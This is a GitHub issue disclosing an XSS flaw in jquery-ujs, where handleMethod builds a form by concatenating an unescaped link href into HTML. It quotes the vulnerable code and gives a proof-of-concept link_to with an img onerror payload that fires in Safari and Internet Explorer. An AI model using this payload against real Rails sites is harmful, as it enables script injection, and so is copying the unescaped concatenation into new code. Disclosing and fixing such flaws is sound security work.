Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS in some browsers #517

Open
ooooooo-q opened this issue Feb 4, 2020 · 0 comments · May be fixed by #518
Open

XSS in some browsers #517

ooooooo-q opened this issue Feb 4, 2020 · 0 comments · May be fixed by #518

Comments

@ooooooo-q
Copy link

hello,

I found an XSS that occurs with jquery-ujs and jquery-rails.
I have confirmed the operation with Safari and IE (and old version of Edge).

The problematic part is the following handleMethod part.
The value of href is used without escaping. (The method, csrfParam, csrfToken have the same problem, but it is rare for user input to enter this part.)

// https://github.com/rails/jquery-ujs/blob/master/src/rails.js#L215

handleMethod: function(link) {
  var href = rails.href(link),
    method = link.data('method'),
    target = link.attr('target'),
    csrfToken = rails.csrfToken(),
    csrfParam = rails.csrfParam(),
    form = $('<form method="post" action="' + href + '"></form>'),
    metadataInput = '<input name="_method" value="' + method + '" type="hidden" />';

  if (csrfParam !== undefined && csrfToken !== undefined && !rails.isCrossDomain(href)) {
    metadataInput += '<input name="' + csrfParam + '" value="' + csrfToken + '" type="hidden" />';
  }    

This value is taken from the DOM .href

//https://github.com/rails/jquery-ujs/blob/master/src/rails.js#L101
href: function(element) {
  return element[0].href;
},

// https://github.com/rails/jquery-ujs/blob/master/src/rails.js#L430
$document.on('click.rails', rails.linkClickSelector, function(e) {
  var link = $(this), method = link.data('method'), data = link.data('params'), metaClick = e.metaKey || e.ctrlKey;

  ...

  } else if (method) {
    rails.handleMethod(link);
    return false;
  }

PoC

The attack code can be included after #" if the user can write a link as follows:

# erb example
<%= link_to 'alert', '"?">#"><img src=. onerror=alert(location)>', data: { method: 'get' } %>

# rendered html
# => <a data-method="get" href="&quot;?&quot;&gt;#&quot;&gt;&lt;img src=. onerror=alert(location)&gt;">alert</a>

Whether the results of element[0].href were percent encoded was browser dependent.
Firefox and Chrome are encoded, Safari and Internet Explorer are XSS happened.


On the other hand, rails-ujs included in Rails 5 is safe because it operates the DOM directly.
https://github.com/rails/rails/blob/master/actionview/app/assets/javascripts/rails-ujs/features/method.coffee#L26

This issue was reported to hackerone but was out of scope.

@ooooooo-q ooooooo-q linked a pull request Feb 11, 2020 that will close this issue
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant